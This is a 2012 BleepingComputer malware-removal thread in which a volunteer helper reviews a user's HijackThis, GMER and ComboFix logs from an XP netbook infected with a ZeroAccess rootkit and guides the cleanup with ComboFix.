Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Trojan.KillAV and PUM.Hijack.Regedit


  • This topic is locked This topic is locked
57 replies to this topic

#1 worries

worries

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:09:41 AM

Posted 12 May 2012 - 11:45 AM

Hi there,
I have a gateway netbook running on XP.

Mbam tells me I have Trojan.KillAV and Pum.Hijack.Regedit, and they come back after removal on startup (even in safe mode).

I am also having some weird browser issues. Firefox closes down if I search certain things on google. E.g., when I search "Forum tech guy" and click on "Virus & Other Malware Removal", the browser closes. But doesn't if I click on any other part of the forum. Same thing happens if I google "Trojan Kill.AV removal tool" and click on a site.

Also, I have intermittent wireless connection to the internet. If I use windows restore and go back to a point where the internet was working, it works fine for 20 mins and then stops connecting to the internet. But my wireless has no trouble detecting signals. I figure it is associated to viruses because no other device is having trouble connecting to the internet.

Here are the logs, but the post is too long so I have to attach some. Thank you

HijackThis

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 3:03:02 PM, on 11/05/2012
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTMon.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\svchost.exe
C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\uagqecsvc.exe
C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe
C:\PROGRA~1\LAUNCH~1\LManager.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\system32\igfxsrvc.exe
C:\WINDOWS\PLFSetL.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\ViStart\ViStart.exe
C:\Documents and Settings\Annie\Application Data\Dropbox\bin\Dropbox.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\igfxext.exe
C:\WINDOWS\system32\regsrv.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Annie\My Documents\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://homepage.gateway.com/rdr.aspx?b=ACGW&l=1009&m=lt20&r=0xph0511x415l03c4wuj5a48l2u599
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.gateway.com/rdr.aspx?b=ACGW&l=1009&m=lt20&r=0xph0511x415l03c4wuj5a48l2u599
F1 - win.ini: run=C:\WINDOWS\system32\mouse_configurator.win
O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Use the DivX Plus Web Player to watch web videos with less interruptions and smoother playback on supported sites - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~3\Office12\GRA8E1~1.DLL
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O4 - HKLM\..\Run: [IAAnotif] C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe
O4 - HKLM\..\Run: [LManager] C:\PROGRA~1\LAUNCH~1\LManager.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [AzMixerSel] C:\Program Files\Realtek\Audio\Drivers\AzMixerSel.exe
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [PLFSetL] C:\WINDOWS\PLFSetL.exe
O4 - HKLM\..\Run: [snp2uvc] rundll32.exe C:\WINDOWS\system32\csnp2uvc.dll,ResetCIDS
O4 - HKLM\..\Run: [PLFSetI] C:\Program Files\PLFSetI.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [Israfel] C:\WINDOWS\system32\Israfel.vbs
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Facebook Update] "C:\Documents and Settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
O4 - HKCU\..\Run: [AttachmentWiperiportal.sickkids.ca] "C:\Documents and Settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\AttachmentWiper.exeBatchRun\run.bat"
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe
O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\Annie\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [freeklogger.exe] C:\Program Files\FK_Monitor\freeklogger.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: Dropbox.lnk = C:\Documents and Settings\Annie\Application Data\Dropbox\bin\Dropbox.exe
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_D183CA64F05FDD98.dll/cmsidewiki.html
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - http://download.eset.com/special/eos-beta/OnlineScanner.cab
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~3\Office12\GR99D3~1.DLL
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Intel® Matrix Storage Event Monitor (IAANTMON) - Intel Corporation - C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTMon.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe

--
End of file - 7687 bytes

ARK
GMER 1.0.15.15641 - http://www.gmer.net
Rootkit scan 2012-05-12 04:08:08
Windows 5.1.2600 Service Pack 3 Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-0 ST916031 rev.0001
Running: t4v5pmm0.exe; Driver: C:\DOCUME~1\Annie\LOCALS~1\Temp\kwldqpow.sys


---- User code sections - GMER 1.0.15 ----

.text C:\Program Files\Mozilla Firefox\firefox.exe[2572] ntdll.dll!LdrLoadDll 7C9163C3 5 Bytes JMP 01262EC0 C:\Program Files\Mozilla Firefox\xul.dll (Mozilla Foundation)

---- Devices - GMER 1.0.15 ----

AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 wdf01000.sys (WDF Dynamic/Microsoft Corporation)
AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 wdf01000.sys (WDF Dynamic/Microsoft Corporation)

Device mrxsmb.sys (Windows NT SMB Minirdr/Microsoft Corporation)

---- Registry - GMER 1.0.15 ----

Reg HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted@C:\Acer\ScreenSaver\screensaver_lt_1024_gtw_1.1.0722.exe 1

---- Files - GMER 1.0.15 ----

File C:\WINDOWS\$NtUninstallKB15745$\2326153432 0 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\@ 2048 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\click.tlb 2144 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\L 0 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\L\baxleibp 455296 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\loader.tlb 2540 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U 0 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@00000001 45968 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@000000c0 3584 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@000000cb 3072 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@000000cf 1536 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@80000000 26112 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@800000c0 35840 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@800000cb 27648 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2326153432\U\@800000cf 27648 bytes
File C:\WINDOWS\$NtUninstallKB15745$\2483834660 0 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432 0 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\@ 2048 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\cfg.ini 63 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\Desktop.ini 4608 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\L 0 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\L\baxleibp 138112 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U 0 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\00000001.@ 2048 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\00000002.@ 224768 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\00000004.@ 1024 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\80000000.@ 66560 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\80000004.@ 12800 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\U\80000032.@ 73216 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2326153432\version 856 bytes
File C:\WINDOWS\$NtUninstallKB49790$\2815177502 0 bytes
ADS C:\WINDOWS\3628639882:1968813863.exe 816 bytes executable

---- EOF - GMER 1.0.15 ----

Attached Files



BC AdBot (Login to Remove)

 


#2 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:41 PM

Posted 12 May 2012 - 12:04 PM

Hello worries ! Welcome to BleepingComputer Forums! :welcome:

My name is Georgi and and I will be helping you with your computer problems.

Before we begin, please note the following:
  • I will working be on your Malware issues, this may or may not, solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested ! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.





IMPORTANT NOTE: One or more of the identified infections is related to the rootkit ZeroAccess. Rootkits, backdoor Trojans, Botnets, and IRCBots are very dangerous because they compromise system integrity by making changes that allow it to be used be the attacker for malicious purposes. Rootkits are used be Trojans to conceal its presence (hide from view) in order to prevent detection of an attacker's software and make removal more difficult. Many rootkits can hook into the Windows 32-bit kernel, and patch several APIs to hide new registry keys and files they install. They can disable your anti-virus and security tools to prevent detection and removal. Remote attackers use backdoors as a means of accessing and taking control of a computer that bepasses security mechanisms. This type of exploit allows them to steal sensitive information like passwords, personal and financial data which is send back to the hacker. To learn more about these types of infections, you can refer to:If your computer was used for online banking, has credit card information or other sensitive data on it, you should stay disconnected from the Internet until your system is fully cleaned. All passwords should be changed immediately to include those used for banking, email, eBay, paypal and online forums. You should consider them to be compromised and change each password using a clean computer, not the infected one. If not, an attacker may get the new passwords and transaction information. If using a router, you need to reset it with a strong logon/password so the malware cannot gain control before connect again. Banking and credit card institutions should be notified of the possible security breach. Because your computer was compromised please read:Although the infection has been identified and may be removed, your PC has likely been compromised and there is no way to be sure the computer can ever be trusted again. It is dangerous and incorrect to assume the computer is secure even if the malware appears to have been removed. In some instances an infection may have caused so much damage to your system that it cannot be completely cleaned or repaired so you can never be sure that you have completely removed a rootkit. The malware may leave so many remnants behind that security tools cannot find them. Tools that claim to be able to remove rootkits cannot guarantee that all traces of it will be removed. Many experts in the security community believe that once infected with this type of malware, the best course of action is to wipe the drive clean, reformat and reinstall the OS. Please read:




We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. If you decide to continue please do this:


Please download ComboFix from the link below:

Combofix

Save it to your Desktop <-- Important!!!

  • Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. Please refer to this link for instructions.

  • Double click it & follow the prompts.

  • As part of it's process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. With malware infections being as they are today, it's strongly recommended to have this pre-installed on your machine before doing any malware removal. It will allow you to boot up into a special recovery/repair mode that will allow us to more easily help you should your computer have a problem after an attempted removal of malware.

  • Follow the prompts to allow ComboFix to download and install the Microsoft Windows Recovery Console, and when prompted, agree to the End-User License Agreement to install the Microsoft Windows Recovery Console.

**Please note: If the Microsoft Windows Recovery Console is already installed, ComboFix will continue it's malware removal procedures.

Posted Image


Once the Microsoft Windows Recovery Console is installed using ComboFix, you should see the following message:

Posted Image

Click on Yes, to continue scanning for malware.

When finished, it will produce a log for you. Please include the C:\ComboFix.txt in your next reply



Regards,
Georgi

cXfZ4wS.png


#3 worries

worries
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:09:41 AM

Posted 12 May 2012 - 01:19 PM

Hi,
here it is. But the file is too big to attach. And the copied version is too long to post. So I am going to post it here in parts.

Part1:

ComboFix 12-05-12.01 - Annie 12/05/2012 13:57:13.1.2 - x86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.2.1033.18.1014.747 [GMT -4:00]
Running from: c:\documents and settings\Annie\Desktop\ComboFix.exe
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\Annie\Local Settings\Application Data\8aa648d8\U
c:\documents and settings\Annie\Local Settings\Application Data\8aa648d8\U\800000cb.@
c:\documents and settings\Annie\Local Settings\Application Data\aavu.exe
c:\documents and settings\Annie\Local Settings\Application Data\gmlb.exe
c:\documents and settings\Annie\Local Settings\Application Data\jlmd.exe
c:\documents and settings\Annie\Local Settings\Application Data\nclp.exe
c:\documents and settings\Annie\Local Settings\Application Data\nlvw.exe
c:\documents and settings\Annie\Local Settings\Application Data\shym.exe
c:\documents and settings\Annie\Local Settings\Application Data\wayd.exe
c:\documents and settings\Annie\Local Settings\Application Data\xtie.exe
c:\windows\$NtUninstallKB15745$
c:\windows\$NtUninstallKB15745$\2326153432\@
c:\windows\$NtUninstallKB15745$\2326153432\click.tlb
c:\windows\$NtUninstallKB15745$\2326153432\L\baxleibp
c:\windows\$NtUninstallKB15745$\2326153432\loader.tlb
c:\windows\$NtUninstallKB15745$\2326153432\U\@00000001
c:\windows\$NtUninstallKB15745$\2326153432\U\@000000c0
c:\windows\$NtUninstallKB15745$\2326153432\U\@000000cb
c:\windows\$NtUninstallKB15745$\2326153432\U\@000000cf
c:\windows\$NtUninstallKB15745$\2326153432\U\@80000000
c:\windows\$NtUninstallKB15745$\2326153432\U\@800000c0
c:\windows\$NtUninstallKB15745$\2326153432\U\@800000cb
c:\windows\$NtUninstallKB15745$\2326153432\U\@800000cf
c:\windows\$NtUninstallKB15745$\2483834660
c:\windows\$NtUninstallKB49790$
c:\windows\$NtUninstallKB49790$\2326153432\@
c:\windows\$NtUninstallKB49790$\2326153432\cfg.ini
c:\windows\$NtUninstallKB49790$\2326153432\Desktop.ini
c:\windows\$NtUninstallKB49790$\2326153432\L\baxleibp
c:\windows\$NtUninstallKB49790$\2326153432\U\00000001.@
c:\windows\$NtUninstallKB49790$\2326153432\U\00000002.@
c:\windows\$NtUninstallKB49790$\2326153432\U\00000004.@
c:\windows\$NtUninstallKB49790$\2326153432\U\80000000.@
c:\windows\$NtUninstallKB49790$\2326153432\U\80000004.@
c:\windows\$NtUninstallKB49790$\2326153432\U\80000032.@
c:\windows\$NtUninstallKB49790$\2326153432\version
c:\windows\$NtUninstallKB49790$\2815177502
c:\windows\system32\regsrv.exe
.
.
((((((((((((((((((((((((( Files Created from 2012-04-12 to 2012-05-12 )))))))))))))))))))))))))))))))
.
.
2012-05-12 17:38 . 2012-05-12 17:38 -------- d-----w- c:\windows\system32\wbem\Repository
2012-05-12 08:24 . 2012-05-12 08:24 -------- d-----w- c:\documents and settings\Administrator\Local Settings\Application Data\Mozilla
2012-05-11 14:21 . 2012-05-11 14:21 -------- d-----w- c:\documents and settings\Administrator\Application Data\Malwarebytes
2012-05-11 13:16 . 2012-05-11 13:16 -------- d-----w- c:\documents and settings\Annie\Application Data\QuickScan
2012-05-11 00:29 . 2012-05-11 00:29 -------- d-----w- c:\program files\Java
2012-05-11 00:29 . 2012-05-11 00:29 -------- d-----w- c:\program files\Common Files\Java
2012-05-11 00:19 . 2012-05-11 00:20 -------- d-----w- C:\temp
2012-05-11 00:19 . 2012-05-11 00:19 -------- d-----w- c:\documents and settings\All Users\Application Data\Atheros
2012-05-11 00:15 . 2012-05-11 00:15 -------- d-----w- c:\documents and settings\All Users\Application Data\Broadcom
2012-05-10 17:15 . 2012-05-10 17:15 -------- d-----w- c:\documents and settings\Annie\Application Data\FK_Monitor
2012-05-02 03:56 . 2012-05-02 05:44 -------- d-----w- c:\program files\FK_Monitor
2012-04-25 04:01 . 2012-05-10 17:15 -------- d-----w- c:\program files\ZAR
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-03-01 14:42 . 2011-12-21 05:50 272349 ----a-w- c:\windows\system32\hta.vbs
2012-03-01 14:42 . 2011-12-05 17:26 272349 ----a-w- c:\windows\system32\Israfel.vbs
2012-03-01 14:42 . 2011-12-05 17:26 272349 ----a-w- c:\windows\system32\GEDZAC.vbs
2012-03-01 14:42 . 2011-12-05 17:26 272349 ----a-w- c:\windows\system32\File.vbs
2011-11-11 15:22 . 2011-05-06 05:03 134104 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2011-02-18 05:12 94208 ----a-w- c:\documents and settings\Annie\Application Data\Dropbox\bin\DropboxExt.14.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2011-02-18 05:12 94208 ----a-w- c:\documents and settings\Annie\Application Data\Dropbox\bin\DropboxExt.14.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2011-02-18 05:12 94208 ----a-w- c:\documents and settings\Annie\Application Data\Dropbox\bin\DropboxExt.14.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2011-02-18 05:12 94208 ----a-w- c:\documents and settings\Annie\Application Data\Dropbox\bin\DropboxExt.14.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"="c:\program files\Spybot - Search & Destroy\TeaTimer.exe" [2009-01-26 2144088]
"Facebook Update"="c:\documents and settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe" [2011-11-07 137536]
"AttachmentWiperiportal.sickkids.ca"="c:\documents and settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\AttachmentWiper.exeBatchRun\run.bat" [2012-03-21 538]
"DAEMON Tools Lite"="c:\program files\DAEMON Tools Lite\DTLite.exe" [2012-01-24 3478336]
"ViStart"="c:\program files\ViStart\ViStart.exe" [2011-11-27 856064]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IAAnotif"="c:\program files\Intel\Intel Matrix Storage Manager\iaanotif.exe" [2008-04-15 178712]
"LManager"="c:\progra~1\LAUNCH~1\LManager.exe" [2009-02-12 862728]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2008-02-28 141848]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-02-28 166424]
"Persistence"="c:\windows\system32\igfxpers.exe" [2008-02-28 137752]
"RTHDCPL"="RTHDCPL.EXE" [2009-02-24 17529856]
"AzMixerSel"="c:\program files\Realtek\Audio\Drivers\AzMixerSel.exe" [2006-07-17 53248]
"IMJPMIG8.1"="c:\windows\IME\imjp8_1\IMJPMIG.EXE" [2008-04-14 208952]
"MSPY2002"="c:\windows\system32\IME\PINTLGNT\ImScInst.exe" [2008-04-14 59392]
"PHIME2002ASync"="c:\windows\system32\IME\TINTLGNT\TINTSETP.EXE" [2008-04-14 455168]
"PHIME2002A"="c:\windows\system32\IME\TINTLGNT\TINTSETP.EXE" [2008-04-14 455168]
"PLFSetL"="c:\windows\PLFSetL.exe" [2008-07-03 94208]
"snp2uvc"="c:\windows\system32\csnp2uvc.dll" [2009-02-16 196608]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-02-06 1430824]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2010-05-14 248552]
"Israfel"="c:\windows\system32\Israfel.vbs" [2012-03-01 272349]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]
.
c:\documents and settings\Annie\Start Menu\Programs\Startup\
Dropbox.lnk - c:\documents and settings\Annie\Application Data\Dropbox\bin\Dropbox.exe [2012-2-14 24246216]
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DivXUpdate]
2011-03-21 18:56 1230704 -c--a-w- c:\program files\DivX\DivX Update\DivXUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VideoWebCamera]
2009-05-20 02:30 1552501 ----a-w- c:\program files\VideoWebCamera\VideoWebCamera.exe
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
"DisableNotifications"= 1 (0x1)
.
R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver;c:\windows\system32\drivers\dtsoftbus01.sys [25/01/2012 4:33 PM 242240]
R2 uagqecsvc;Microsoft Forefront UAG Quarantine Enforcement Client;c:\documents and settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\uagqecsvc.exe [19/01/2012 12:58 AM 149904]
R3 L1c;NDIS Miniport Driver for Atheros AR8131/AR8132 PCI-E Ethernet Controller;c:\windows\system32\drivers\l1c51x86.sys [03/08/2009 5:09 PM 38912]
S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [03/08/2009 3:18 PM 1684736]
S3 hwusbdev;Huawei DataCard USB PNP Device;c:\windows\system32\drivers\ewusbdev.sys [30/11/2011 10:18 AM 100736]
S3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\system32\drivers\RtsUStor.sys [03/08/2009 3:13 PM 162816]
S3 Rts516xIR;Realtek IR Driver;c:\windows\system32\DRIVERS\Rts516xIR.sys --> c:\windows\system32\DRIVERS\Rts516xIR.sys [?]
.
Contents of the 'Scheduled Tasks' folder
.
2012-05-12 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
- c:\documents and settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe [2011-11-07 16:46]
.
2012-05-12 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job
- c:\documents and settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe [2011-11-07 16:46]
.
2012-05-09 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
- c:\documents and settings\Annie\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2012-03-22 15:13]
.
